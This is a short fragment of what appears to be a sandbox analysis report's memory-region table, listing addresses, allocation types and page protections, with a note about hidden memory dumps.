page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24C60000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
770000
|
heap
|
page read and write
|
||
|
7A0000
|
heap
|
page read and write
|
There are 470 hidden memdumps, click here to show them.